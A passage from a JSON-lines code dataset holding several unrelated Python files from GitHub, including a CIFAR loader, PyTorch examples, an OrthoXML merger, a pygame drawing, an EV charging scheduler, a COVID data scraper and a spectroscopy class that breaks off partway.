import cPickle\n fo = open(file, 'rb')\n dict = cPickle.load(fo)\n fo.close()\n return dict\n\ndict = unpickle('data_batch_1')\ntr_N = len(dict['data'])\nX = np.zeros((tr_N, 32, 32, 3), dtype=np.uint8)\ny = np.zeros(tr_N, dtype=np.int64)\n\nfor i in range(tr_N):\n X[i] = dict['data'][i].reshape((32, 32, 3), order = 'F')\n y[i] = dict['labels'][i]\n\nprint(X)\nprint(y)\nplt.imshow(X[0])\nplt.show()","repo_name":"jxzhuge12/cse253","sub_path":"cse253hw3/showImage.py","file_name":"showImage.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74058277254","text":"import torch\nimport torch.nn as nn\nfrom collections import OrderedDict\n\nseq_model = nn.Sequential(\n nn.Linear(1, 11),\n nn.Tanh(),\n nn.Linear(11, 1)\n )\n\nnamedseq_model = nn.Sequential(OrderedDict([\n ('hidden_linear', nn.Linear(1, 13)),\n ('hidden_activation', nn.Tanh()),\n ('output_linear', nn.Linear(13, 1))\n ]))\n\nclass SelfSubModule(nn.Module):\n def __init__(self):\n super().__init__()\n self.hidden_linear = nn.Linear(1, 8)\n self.hidden_activation = nn.Tanh()\n self.output_linear = nn.Linear(8, 1)\n #assigning an instance of nn.Module to an attribute in a nn.Module, as you did in the constructor here, automatically registers the module as a submodule, which gives modules(SelfSubModule) access to the parameters of its submodules(hidden_linear, hidden_activation, output_linear) without further action by the user.\n def forward(self, input): #input is the input data\n hidden_t = self.hidden_linear(input)\n activated_t = self.hidden_activation(hidden_t)\n output_t = self.output_linear(activated_t)\n return output_t\n\nsubclass_model = SelfSubModule()\n#what happens below is that the named_parameters() call delves into all submodules assigned as attributes in the constructor and recursively calls named_parameters() on each one of them.\nfor type_str, model in [('seq', seq_model), ('namedseq', namedseq_model), ('subclass', subclass_model)]:\n print(type_str)\n for name_str, param in model.named_parameters():\n print(\"{:21} {:19}\".format(name_str, str(param.shape)))\n print()\n\nprint('hidden_activation:', subclass_model.hidden_activation) ##The Tanh() module can be accessed as an attribute using the given name:\"hidden_activation\".\n","repo_name":"chengliu-LR/notebooks-Colab","sub_path":"PyTorch/dlwpt_5_nn_subclassing.py","file_name":"dlwpt_5_nn_subclassing.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37223836370","text":"from xml.etree import ElementTree as ET\nfrom typing import List, Iterable\nfrom random import randint\n\n\n\nclass GeneRefManager:\n def __init__(self):\n self.xrefs = {}\n self.ids = set([])\n\n def _random_unused_id(self):\n while True:\n cand = randint(100000, 1000000000)\n if str(cand) not in self.ids:\n return str(cand)\n\n def register_and_reassign(self, gene_nodes:Iterable[ET.Element]):\n update_ids = {}\n to_rem = []\n for gene in gene_nodes:\n if gene.attrib['id'] in self.ids:\n if gene.attrib['protId'] in self.xrefs:\n # protId already in set. is it unique? if yes, no action, otherwise error\n if self.xrefs[gene.attrib['protId']] != gene.attrib['id']:\n raise ValueError(\"protId '{}' is used several times with different gene id :'{},'{}'\"\n .format(gene.attrib['protId'], self.xrefs[gene.attrib['protId']], gene.attrib['id']))\n else:\n to_rem.append(gene.attrib['id'])\n continue\n else:\n # reassign internal gene id.\n new_id = self._random_unused_id()\n update_ids[gene.attrib['id']] = new_id\n gene.attrib['id'] = new_id\n\n self.xrefs[gene.attrib['protId']] = gene.attrib['id']\n self.ids.add(gene.attrib['id'])\n return update_ids, to_rem\n\n\nclass Merger:\n def __init__(self, first):\n self.NS = \"http://orthoXML.org/2011/\"\n ET.register_namespace(\"\", self.NS)\n self.doc = ET.parse(first)\n self.root = self.doc.getroot()\n\n self.all_species = set(z.attrib['name'] for z in self.doc.findall('./{{{}}}species'.format(self.NS)))\n self.all_genes = GeneRefManager()\n self.all_genes.register_and_reassign(\n self.doc.findall(\"./{{{0}}}species/{{{0}}}database/{{{0}}}genes/{{{0}}}gene\".format(self.NS))\n )\n\n def merge_file(self, other):\n gene_id_updates, to_rem = self.all_genes.register_and_reassign(\n other.findall(\"./{{{0}}}species/{{{0}}}database/{{{0}}}genes/{{{0}}}gene\".format(self.NS)))\n self._remove_unnecessary_genes(other, to_rem)\n self._update_geneRef_ids(other.find('./{{{}}}groups'.format(self.NS)), gene_id_updates)\n\n for sp in other.findall(\"./{{{}}}species\".format(self.NS)):\n if sp.attrib['name'] not in self.all_species:\n species_seen = False\n for i, el in enumerate(self.root):\n if el.tag == \"{{{}}}species\".format(self.NS):\n species_seen = True\n elif species_seen:\n break\n self.root.insert(i, sp)\n self.all_species.add(sp.attrib['name'])\n else:\n db = self.root.find(\"./{{{0}}}species[@name='{1}']/{{{0}}}database/{{{0}}}genes\".format(self.NS, sp.attrib['name']))\n for g in sp.iterfind(\".//{{{}}}gene\".format(self.NS)):\n db.append(g)\n grps = self.root.find(\"./{{{}}}groups\".format(self.NS))\n for g in other.find(\"./{{{}}}groups\".format(self.NS)):\n grps.append(g)\n\n def _update_geneRef_ids(self, root, gene_id_updates):\n for old_id, new_id in gene_id_updates.items():\n for g in root.iterfind(\".//{{{0}}}geneRef[@id='{1}']\".format(self.NS, old_id)):\n g.attrib['id'] = new_id\n\n def _remove_unnecessary_genes(self, root, to_rem):\n for e in to_rem:\n parent = root.find(\"./{{{0}}}species/{{{0}}}database/{{{0}}}genes/{{{0}}}gene[@id='{1}']/..\"\n .format(self.NS, e))\n child = parent.find(\"./{{{0}}}gene[@id='{1}']\".format(self.NS, e))\n parent.remove(child)\n\n\n\n\n def write(self, fh):\n self.doc.write(fh, xml_declaration=True, encoding=\"UTF-8\", default_namespace=None)\n\n\ndef merge_orthoxml_files(out, files):\n \"\"\"function to merge several orthoxml files into a single orthoxml file that contains all groups.\n\n This function combines several orthoxml files into a single orthoxml file that\n contains all the groups and maintains a valid definition block of the species\n and their genes. The protId attributes among all the orthoxml files need to be\n either unique or being at least assigned to the same internal gene id; in that\n case it is assumed that it is the same gene across the different files and it\n can be merged.\n if the gene id attribute is the same two or more orthoxml files, but their\n protId value is different, a new gene id value is generated and the geneRef\n values are updated accordingly.\n\n :param out: a path or a filehandle object where the combined orthoxml data should\n be written to.\n\n :param files: a list of paths or filehandle objects (of valid orthoxml format) that\n should be merged.\n\n \"\"\"\n\n first = files.pop()\n merger = Merger(first)\n for f in files:\n merger.merge_file(ET.parse(f).getroot())\n\n return merger.write(out)\n","repo_name":"DessimozLab/FastOMA","sub_path":"FastOMA/zoo/hog/orthoxml_merge.py","file_name":"orthoxml_merge.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"5253772697","text":"# Import a library of functions called 'pygame'\r\nimport pygame\r\n\r\n# Initialize the game engine\r\npygame.init()\r\n\r\n# Define some colors\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nSKY_BLUE = (0, 225, 255)\r\nBLUE = (0, 150, 255)\r\nGREEN = (0, 255, 0)\r\nRED = (255, 0, 0)\r\nOCEAN_GREEN = (11, 160, 89)\r\nYELLOW = (250, 220, 8)\r\nORANGE = (250, 180, 8)\r\n\r\nPI = 3.141592653\r\n\r\n# Set the height and width of the screen\r\nsize = (700, 500)\r\n\r\n# Create the screen\r\nscreen = pygame.display.set_mode(size)\r\n\r\n# Name te screen\r\npygame.display.set_caption(\"Ocean's sunset\")\r\n\r\n# Loop until the user clicks the close button.\r\ndone = False\r\n\r\n# Create a clock\r\nclock = pygame.time.Clock()\r\n\r\n# Loop as long as done == False\r\nwhile not done:\r\n for event in pygame.event.get(): # User did something\r\n if event.type == pygame.QUIT: # If user clicked close\r\n done = True # Flag that we are done so we exit this loop\r\n\r\n # Clear the screen and set the screen background\r\n screen.fill(WHITE)\r\n\r\n # Sky\r\n pygame.draw.line(screen, SKY_BLUE, [0 ,0], [0,250], 1500)\r\n\r\n # Sun\r\n pygame.draw.circle(screen, YELLOW, (225, 250), 130, 130)\r\n\r\n # Ocean\r\n pygame.draw.line(screen, BLUE, [0,250], [0, 500], 1500)\r\n\r\n # Birds\r\n for offset in range(90, 0, -30):\r\n pygame.draw.arc(screen, BLACK, [365 + offset, 100+ offset, 110, 100], PI/6, PI / 2, 2)\r\n pygame.draw.arc(screen, BLACK, [455+ offset, 100+ offset, 110, 100], PI/2, 5*PI/6, 2)\r\n\r\n # Sun's reflection on the ocean\r\n for y_offset in range(0, 100, 10):\r\n pygame.draw.line(screen, ORANGE, [100 + y_offset, 260 + y_offset], [350 - y_offset, 260 + y_offset], 5)\r\n\r\n # Sailing Boat\r\n pygame.draw.polygon(screen, WHITE, [[350, 300], [360, 300], [360, 280], [365, 300], [375, 300], [370, 303], [355, 303]], 5)\r\n\r\n # Clouds\r\n for offset in range (0,390,130):\r\n pygame.draw.ellipse(screen, WHITE, [250 + offset, 70, 50, 25], 10)\r\n pygame.draw.circle(screen, WHITE, (270 + offset, 80), 10, 10)\r\n pygame.draw.circle(screen, WHITE, (295 + offset, 80), 20, 20)\r\n pygame.draw.circle(screen, WHITE, (320 + offset, 80), 10, 10)\r\n pygame.draw.ellipse(screen, WHITE, [290 + offset, 70, 50, 25], 10)\r\n\r\n # Select the font to use, size, bold, italics\r\n font = pygame.font.SysFont('Calibri', 25, True, False)\r\n\r\n # Render the text. \"True\" means anti-aliased text.\r\n # Black is the color. This creates an image of the\r\n # letters, but does not put it on the screen\r\n text = font.render(\"Sunset\", True, BLACK)\r\n\r\n # Put the image of the text on the screen at 300x250\r\n screen.blit(text, [600, 400])\r\n\r\n # Go ahead and update the screen with what we've drawn.\r\n # This MUST happen after all the other drawing commands.\r\n pygame.display.flip()\r\n\r\n # This limits the while loop to a max of 60 times per second.\r\n # Leave this out and we will use all CPU we can.\r\n clock.tick(60)\r\n\r\n# Be IDLE friendly\r\npygame.quit()","repo_name":"dianacoccoferro/Arcade-Games","sub_path":"Lab_5.py","file_name":"Lab_5.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11634460861","text":"import numpy as np\r\nimport copy \r\nimport pandas as pd\r\nfrom problem_model import problem\r\nimport heapq\r\nimport networkx as nx\r\n\r\n_EPS = 1e-4\r\n\r\n\"\"\"\r\nCharge to maximum required - Travel to other node - Repeat method \r\n\"\"\"\r\nclass CTR(object):\r\n def __init__(self,p):\r\n self.p = p\r\n self.events_heap = []\r\n self.paths = []\r\n self.at = []\r\n self.time = []\r\n self.node_free_charging = [-1 for _ in range(p.n)]\r\n self.ev_events = []\r\n self.current_battery = []\r\n \r\n def get_paths(self):\r\n for i in range(self.p.k):\r\n self.paths.append(nx.shortest_path(self.p.Graphs[i],source=self.p.source_node[i],target=self.p.destination_node[i], weight='weight'))\r\n net_b = self.p.battery_usage_on_path(i,self.paths[-1])\r\n if abs(net_b - self.p.initial_battery[i]) <= _EPS or net_b < self.p.initial_battery[i]:\r\n self.at.append(len(self.paths[-1])-1)\r\n self.time.append(net_b/self.p.discharging_rate[i])\r\n self.ev_events.append([(self.time[-1],f\"reached without charging at destination on path {self.paths[-1]}\")])\r\n continue\r\n\r\n self.at.append(0)\r\n b = self.p.max_battery[i] - self.p.initial_battery[i]\r\n self.current_battery.append(self.p.initial_battery[i])\r\n charge_complete_time = min(b,net_b-self.p.initial_battery[i])/self.p.charging_rate[i]\r\n if self.node_free_charging[self.paths[-1][0]] == -1:\r\n self.time.append(0)\r\n self.ev_events.append([(0,f\"started charging at {self.paths[-1][0]}\")])\r\n self.node_free_charging[self.paths[-1][0]] = charge_complete_time\r\n else:\r\n self.time.append(self.node_free_charging[self.paths[-1][0]])\r\n self.ev_events.append([(self.node_free_charging[self.paths[-1][0]],f\"started charging at {self.paths[-1][0]}\")])\r\n self.node_free_charging[self.paths[-1][0]] += charge_complete_time\r\n return\r\n\r\n def set_paths(self,paths):\r\n self.paths = paths\r\n for i in range(self.p.k):\r\n net_b = self.p.battery_usage_on_path(i,self.paths[i])\r\n if abs(net_b - self.p.initial_battery[i]) <= _EPS or net_b < self.p.initial_battery[i]:\r\n self.at.append(len(self.paths[i])-1)\r\n self.time.append(net_b/self.p.discharging_rate[i])\r\n self.ev_events.append([(self.time[-1],f\"reached without charging at destination on path {self.paths[i]}\")])\r\n continue\r\n\r\n self.at.append(0)\r\n b = self.p.max_battery[i] - self.p.initial_battery[i]\r\n self.current_battery.append(self.p.initial_battery[i])\r\n charge_complete_time = min(b,net_b-self.p.initial_battery[i])/self.p.charging_rate[i]\r\n if self.node_free_charging[self.paths[i][0]] == -1:\r\n self.time.append(0)\r\n self.ev_events.append([(0,f\"started charging at {self.paths[i][0]}\")])\r\n self.node_free_charging[self.paths[i][0]] = charge_complete_time\r\n else:\r\n self.time.append(self.node_free_charging[self.paths[i][0]])\r\n self.ev_events.append([(self.node_free_charging[self.paths[i][0]],f\"started charging at {self.paths[i][0]}\")])\r\n self.node_free_charging[self.paths[i][0]] += charge_complete_time\r\n return\r\n\r\n def init_events(self):\r\n for i in range(self.p.k):\r\n if self.at[i]==len(self.paths[i])-1:\r\n continue\r\n net_b = self.p.battery_usage_on_path(i,self.paths[i])\r\n b = self.p.max_battery[i] - self.p.initial_battery[i]\r\n charge_complete_time = min(b,net_b-self.p.initial_battery[i])/self.p.charging_rate[i]\r\n self.events_heap.append((self.time[i]+charge_complete_time,i,'charging'))\r\n self.ev_events[i].append((self.time[i]+charge_complete_time,f\"completed charging at {self.paths[i][0]}\"))\r\n heapq.heapify(self.events_heap)\r\n\r\n def run(self):\r\n\r\n self.get_paths()\r\n self.init_events()\r\n\r\n while len(self.events_heap) > 0:\r\n event_complete_time,ev_id,etype = self.events_heap[0]\r\n heapq.heappop(self.events_heap)\r\n\r\n if etype == 'charging':\r\n if abs(self.node_free_charging[self.paths[ev_id][self.at[ev_id]]]-event_complete_time)<=_EPS:\r\n self.node_free_charging[self.paths[ev_id][self.at[ev_id]]]=-1\r\n self.time[ev_id]=event_complete_time\r\n u,v = self.paths[ev_id][self.at[ev_id]],self.paths[ev_id][self.at[ev_id]+1]\r\n edge_travel_time = self.p.time_to_travel(ev_id,(u,v))\r\n heapq.heappush(self.events_heap,(self.time[ev_id]+edge_travel_time,ev_id,'traveling'))\r\n self.ev_events[ev_id].append((self.time[ev_id]+edge_travel_time,f\"reached {v}\"))\r\n elif etype == 'traveling':\r\n self.at[ev_id]+=1\r\n self.time[ev_id]=event_complete_time\r\n if self.at[ev_id]==len(self.paths[ev_id])-1:\r\n continue\r\n\r\n u,v = self.paths[ev_id][self.at[ev_id]-1],self.paths[ev_id][self.at[ev_id]]\r\n\r\n b = self.p.battery_usage_on_path(ev_id,self.paths[ev_id][self.at[ev_id]:])\r\n curr_b = self.p.max_battery[ev_id] - self.p.battery_to_travel(ev_id,(u,v))\r\n if abs(b - curr_b) <= _EPS or b < curr_b:\r\n travel_complete_time = b/self.p.discharging_rate[ev_id]\r\n self.time[ev_id]+=travel_complete_time\r\n self.ev_events[ev_id].append((self.time[ev_id],f\"reached destination on path {self.paths[ev_id][self.at[ev_id]:]}\"))\r\n self.at[ev_id]=len(self.paths[ev_id])-1\r\n continue\r\n \r\n charge_complete_time = (min(self.p.max_battery[ev_id]-curr_b,b-curr_b))/self.p.charging_rate[ev_id]\r\n if self.node_free_charging[v] == -1:\r\n # print(ev_id,v,len(self.paths),len(self.paths[ev_id]),len(self.time))\r\n self.events_heap.append((self.time[ev_id]+charge_complete_time,ev_id,'charging'))\r\n self.ev_events[ev_id].append((event_complete_time,f\"started charging at {v}\"))\r\n self.ev_events[ev_id].append((self.time[ev_id]+charge_complete_time,f\"completed charging at {v}\"))\r\n self.node_free_charging[v]=self.time[ev_id]+charge_complete_time\r\n else:\r\n self.events_heap.append((max(self.time[ev_id],self.node_free_charging[v])+charge_complete_time,ev_id,'charging'))\r\n self.ev_events[ev_id].append((self.node_free_charging[v],f\"started charging at {v}\"))\r\n self.ev_events[ev_id].append((max(self.time[ev_id],self.node_free_charging[v])+charge_complete_time,f\"completed charging at {v}\"))\r\n self.node_free_charging[v]=max(self.time[ev_id],self.node_free_charging[v])+charge_complete_time\r\n \r\n heapq.heapify(self.events_heap)\r\n \r\n def print_paths(self):\r\n for i in range(self.p.k):\r\n print(f\"for EV {i} : {self.ev_events[i]}\")\r\n return\r\n\r\np = problem.problem()\r\n\r\np.input(\"gen_testcase.txt\")\r\n\r\np.make_graphs()\r\n\r\nThr_min = p.theoritical_minima()\r\nprint(\"Lower bound is: \",Thr_min,\"\\n\")\r\n\r\nsol = CTR(p)\r\nsol.run()\r\n\r\n# print(sol.time)\r\nprint(\"output of algoritm is: \",np.max(sol.time),\"\\n\")\r\n\r\nprint(\"Paths that are followed are:\\n\")\r\nsol.print_paths()","repo_name":"harshal-dupare/AI61005-term-project","sub_path":"src/ctr.py","file_name":"ctr.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"40359006824","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom db_helper import db_connection\nfrom datetime import date\nimport re\n\n\n\nclass Scrapper():\n def __init__(self):\n self.url=\"https://www.mohfw.gov.in/\"\n self.page=requests.get(self.url)\n self.soup=BeautifulSoup(self.page.content,\"html.parser\")\n self.db=db_connection()\n\n def update_general_collection(self,data):\n today = date.today()\n print(\"Today's date \",today)\n db=self.db.get_collection(\"general\")\n returned_data=db.find({\"date\":str(today)},{\"_id\":0})\n empty_ret_data=True\n for _ in returned_data:\n empty_ret_data=False\n break\n\n if(empty_ret_data==False):\n db.update_one({\"date\":str(today)},{\"$set\":{\"active_case\":data[\"active_case\"],\"discharged_case\":data[\"discharged_case\"],\"migrated_case\":data[\"migrated_case\"],\"death_case\":data[\"death_case\"]}})\n else:\n print(\"New day today updating database accordingly !!\")\n db.insert_one(data)\n\n def update_state_collection(self,data):\n db = self.db.get_collection(\"state_wise\")\n for item in data:\n db.update_one({\"state\":item[\"state\"]},{\"$set\":{\"confirmed\":item[\"confirmed\"],\"foreign\":item[\"foreign\"],\"cured/migrated\":item[\"cured/migrated\"],\"death\":item[\"death\"]}})\n\n def general_info(self):\n today = date.today()\n\n content_div=self.soup.find('div',{'class':\"information_row\"})\n info_dict={\n \"date\":str(today),\n \"active_case\":0,\n \"discharged_case\":0,\n \"migrated_case\":0,\n \"death_case\":0\n }\n active_case_div=content_div.find_all('div',{\"class\":\"iblock\"})[1].find(\"div\",{\"class\":\"iblock_text\"})\n active_cases=active_case_div.find(\"span\").text.strip()\n info_dict[\"active_case\"]=int(active_cases)\n\n discharged_case_div=content_div.find_all('div',{\"class\":\"iblock\"})[2].find(\"div\",{\"class\":\"iblock_text\"})\n discharged_cases=discharged_case_div.find(\"span\").text.strip()\n info_dict[\"discharged_case\"]=int(discharged_cases)\n\n migrated_case_div = content_div.find_all('div',{\"class\":\"iblock\"})[4].find(\"div\",{\"class\":\"iblock_text\"})\n migrated_cases = migrated_case_div.find(\"span\").text.strip()\n info_dict[\"migrated_case\"] = int(migrated_cases)\n\n death_case_div = content_div.find_all('div',{\"class\":\"iblock\"})[3].find(\"div\",{\"class\":\"iblock_text\"})\n death_cases = death_case_div.find(\"span\").text.strip()\n death_cases_no=re.findall('\\d+', death_cases)\n if(len(death_cases_no)>0):\n info_dict[\"death_case\"] = int(death_cases_no[0])\n\n # print(info_dict)\n self.update_general_collection(info_dict)\n\n\n def state_wise_details(self):\n content_div=self.soup.find('div',{'class':'content newtab'})\n table=content_div.find(\"tbody\")\n\n rows=table.find_all(\"tr\")\n info_arr=[]\n for row in rows:\n columns=row.find_all(\"td\")\n temp_dict={}\n if(len(columns)==6):\n temp_dict[\"state\"]=columns[1].text.strip().replace(\" \",\"\").lower()\n temp_dict[\"confirmed\"]=int(columns[2].text.strip())\n temp_dict[\"foreign\"] = int(columns[3].text.strip())\n temp_dict[\"cured/migrated\"]=int(columns[4].text.strip())\n # temp_dict[\"death\"] = int(columns[5].text.strip())\n death_cases_no = re.findall('\\d+',columns[5].text.strip())\n if (len(death_cases_no) > 0):\n temp_dict[\"death\"] = int(death_cases_no[0])\n info_arr.append(temp_dict)\n\n # print(info_arr)\n self.update_state_collection(info_arr)\n\n\n\n\n\n\n","repo_name":"090max/covid19Tracker_server","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"32304920864","text":"from os import listdir\nimport pandas as pd \nfrom os.path import isfile, join\nimport re \nimport docx\nimport csv\nimport math\nimport torch \nimport numpy as np\ndef entropy(Liste, base):\n \"\"\"\n This function computes the entropy of a list of probabilities, provided a basis.\n \"\"\"\n\n if base == \"natural\":\n return -sum([p * math.log(p) for p in Liste])\n else:\n return (-1.0 / math.log(base)) * sum([p * math.log(p) for p in Liste])\n\n\ndef getText(filename):\n doc = docx.Document(filename)\n fullText = []\n for para in doc.paragraphs:\n fullText.append(para.text)\n return '\\n'.join(fullText)\n\ndef segmente(txt):\n chopped = []\n ex = [e for e in set(re.findall(r\"\\[[0-9_]+\\]\", txt)) if len(e)==8]\n labs = [e for e in (re.findall(r\"\\[[0-9_]+\\]\", txt)) if len(e)==8]\n start_id = []\n for e in ex : \n E = e.replace('[','\\[')\n E = E.replace(']','\\]')\n start_id.extend([ m.start() for m in re.finditer(E, txt)])\n start_id.append(len(txt))\n start_id = sorted(start_id)\n for i in range(len(start_id)-1): \n start = start_id[i]+8\n finish = start_id[i+1]\n chopped.append(txt[start:finish])\n return [(clean_text(chopped[i]),labs[i][1:-1]) for i in range(len(chopped))]\n\ndef store_data(code_dict,path):\n with open(join(path,'paragraphs.csv'), 'w', newline='') as csvfile:\n datawriter = csv.writer(csvfile)\n for k in code_dict.keys():\n datawriter.writerow([k,int(code_dict[k][0]),code_dict[k]])\n\n\ndef clean_text(text):\n \n text = text.replace('\\n',' ')\n text = text.replace('\\t',' ')\n\n alphanumeric = re.findall(\"[^œa-zA-ZÀ-ÿ0-9'\\-]\",text)\n for an in alphanumeric:\n text = text.replace(an,' ')\n R = re.findall(\"[ \\t]+\",text)\n if len(R)>0:\n while set(R) != {' '} : \n R = re.findall(\"[ \\t]+\",text)\n for r in R:\n text = text.replace(r,' ')\n\n return text\n\ndef token_list_to_text(token_list):\n text = ''\n for t in token_list:\n text+=t + ' '\n return text[:-1]\n\n\ndef functionize(text,functions_dict,func):\n if func !='NA':\n List = [ t for t in text.split(' ') if t in functions_dict and functions_dict[t] ==func]\n else : \n List = [ t for t in text.split(' ') if t not in functions_dict]\n return token_list_to_text(List)\n\n\ndef save_checkpoint(save_path, model, optimizer, valid_loss):\n\n if save_path == None:\n return\n \n state_dict = {'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'valid_loss': valid_loss}\n \n torch.save(state_dict, save_path)\n print(f'Model saved to ==> {save_path}')\n\n\ndef load_checkpoint(load_path, model, optimizer):\n\n if load_path==None:\n return\n \n state_dict = torch.load(load_path, map_location=device)\n print(f'Model loaded from <== {load_path}')\n\n model.load_state_dict(state_dict['model_state_dict'])\n optimizer.load_state_dict(state_dict['optimizer_state_dict'])\n \n return state_dict['valid_loss']\n\n\ndef save_metrics(save_path, train_loss_list, valid_loss_list, global_steps_list):\n\n if save_path == None:\n return\n \n state_dict = {'train_loss_list': train_loss_list,\n 'valid_loss_list': valid_loss_list,\n 'global_steps_list': global_steps_list}\n \n torch.save(state_dict, save_path)\n print(f'Model saved to ==> {save_path}')\n\n\ndef load_metrics(load_path):\n\n if load_path==None:\n return\n \n state_dict = torch.load(load_path, map_location=device)\n print(f'Model loaded from <== {load_path}')\n \n return state_dict['train_loss_list'], state_dict['valid_loss_list'], state_dict['global_steps_list']\n\ndef labels_to_tensors(labels,tensor_size):\n lab= labels.long().tolist()\n tensors = torch.zeros(labels.shape[0],tensor_size)\n for i in range(len(lab)):\n l = lab[i]\n T = torch.zeros(tensor_size)\n T[l-1]+=1\n tensors[i] += T\n return tensors.long()\n\ndef proba_to_class(output):\n pred = []\n for T in output:\n pred.append(T.argmax().item())\n return pred\n \ndef dictionnize(text,noyau,expressions_dict):\n if text != np.nan : \n List = [ t for t in text.split(' ') if t in expressions_dict and expressions_dict[t] == noyau]\n return token_list_to_text(List)\n else : \n return text ","repo_name":"mehdi123dj/PMS","sub_path":"reccurent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"13248909655","text":"import sys\nsys.stdin = open(\"4047_input.txt\")\n\nT = int(input())\n\nfor tc in range(1,T+1):\n lst = list(' '.join(input()).split())\n pattern = {'S': 0, 'D': 1,'H': 2, 'C': 3}\n card = [[0]*14 for _ in range(4)]\n error = 0\n res = [0]*4\n for i in range(0,len(lst),3):\n index_j = int(lst[i+1])*10+int(lst[i+2])\n card[pattern[lst[i]]][index_j] += 1\n if card[pattern[lst[i]]][index_j] == 2:\n error = 1\n break\n else:\n for i in range(4):\n res[i] = 13 - sum(card[i])\n print('#{} '.format(tc),end='')\n if error:\n print('ERROR')\n else:\n print(*res)\n\n","repo_name":"steven9408/Algorithm_Study","sub_path":"SWEA/SSAFY/99_IMtest/4047.py","file_name":"4047.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38787984855","text":"#!/usr/bin/env python3\n\"\"\"\nCreated on Thu Aug 3 16:42:36 2023\n\n@author: lucasverga\n\"\"\"\n\nimport warnings\n\nimport numpy as np\nfrom pymatgen.io.vasp.inputs import UnknownPotcarWarning\n\nfrom pytaser.internal_abs_generator import Internal_Abs\nfrom pytaser.tas import Das\n\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\n\n\nclass DASGenerator:\n \"\"\"\n Class to generate a DAS spectrum (decomposed and cumulative) from a bandstructure and\n dos object.\n\n Args:\n new_system: Internal_Abs object from internal_abs_generator for the new system\n reference_system: Internal_Abs object from internal_abs_generator for the reference system\n Attributes:\n new_system: Internal_Abs object from internal_abs_generator for the new system\n reference_system: Internal_Abs object from internal_abs_generator for the reference system\n \"\"\"\n\n def __init__(\n self,\n new_system,\n reference_system,\n ):\n self.new_system = new_system\n self.reference_system = reference_system\n\n @classmethod\n def from_vasp_outputs(\n cls,\n vasprun_file_new_system,\n vasprun_file_ref,\n waveder_file_new_system=None,\n waveder_file_ref=None,\n ):\n \"\"\"\n Create a DASGenerator object from VASP output files.\n\n The user should provide the vasprun files for the new system and the reference system,\n followed by the waveder files for the new system and the reference system.\n\n Args:\n vasprun_file_new_system: The vasprun.xml file for the new system.\n vasprun_file_ref: The vasprun.xml file for the reference system.\n waveder_file_new_system: The WAVEDER file for the new system.\n waveder_file_ref: The WAVEDER file for the reference system.\n Returns:\n A DASGenerator object containing the Internal_Abs object for the new system and reference system.\n \"\"\"\n warnings.filterwarnings(\"ignore\", category=UnknownPotcarWarning)\n warnings.filterwarnings(\n \"ignore\", message=\"No POTCAR file with matching TITEL fields\"\n )\n\n new_system = Internal_Abs.internal_from_vasp(\n vasprun_file_new_system, waveder_file_new_system\n )\n reference_system = Internal_Abs.internal_from_vasp(\n vasprun_file_ref, waveder_file_ref\n )\n\n return cls(new_system, reference_system)\n\n @classmethod\n def from_mpid(\n cls,\n mpid,\n mpid_ref,\n bg=None,\n bg_ref=None,\n api_key=None,\n mpr=None,\n mpr_ref=None,\n ):\n \"\"\"\n Import the desired bandstructure and dos objects from the legacy Materials Project\n database.\n\n Args:\n mpid: The Materials Project ID of the new system.\n mpid_ref: The Materials Project ID of the reference system.\n bg: The experimental bandgap (eV) of the new system. If None, the band gap\n of the MP calculation will be used.\n bg_ref: The experimental bandgap (eV) of the reference system. If None, the band gap\n of the MP calculation will be used.\n api_key: The user's Materials Project API key.\n mpr: An MPRester object for the new system if already generated by user.\n mpr_ref: An MPRester object for the reference system if already generated by user.\n\n Returns:\n A DASGenerator object containing the Internal_Abs object for the new system and reference system.\n \"\"\"\n new_system = Internal_Abs.internal_from_mpid(\n mpid, bg=None, api_key=None, mpr=None\n )\n reference_system = Internal_Abs.internal_from_mpid(\n mpid_ref, bg_ref, api_key=None, mpr_ref=None\n )\n\n return cls(new_system, reference_system)\n\n def generate_das(\n self,\n temp,\n energy_min=0,\n energy_max=5,\n gaussian_width=0.1,\n cshift=None,\n step=0.01,\n new_sys_occs=None,\n ref_occs=None,\n processes=None,\n ):\n \"\"\"\n Generates DAS spectra (new system - reference system) based on inputted occupancies,\n and a specified energy mesh. If the DASGenerator has not been generated from VASP\n outputs (and thus does not have a dfc attribute), then the output DAS is generated\n using the change in joint density of states (JDOS) from both systems, with no consideration\n of oscillator strengths. Otherwise, the output DAS is generated considering all contributions\n to the predicted DAS spectrum.\n\n Args:\n temp: Temperature (K) of material we wish to investigate (affects the FD distribution)\n energy_min: Minimum band transition energy to consider for energy mesh (eV)\n energy_max: Maximum band transition energy to consider for energy mesh (eV)\n gaussian_width: Width of gaussian curve\n cshift: Complex shift in the Kramers-Kronig transformation of the dielectric function\n (see https://www.vasp.at/wiki/index.php/CSHIFT). If not set, uses the value of\n CSHIFT from the underlying VASP WAVEDER calculation. (only relevant if the\n DASGenerator has been generated from VASP outputs)\n step: Interval between energy points in the energy mesh.\n new_sys_occs: Optional input parameter for occupancies of the new system, otherwise\n automatically calculated based on input temperature (temp)\n reference_occs: Optional input parameter for occupancies of the reference system, otherwise\n automatically calculated based on input temperature (temp)\n processes: Number of processes to use for 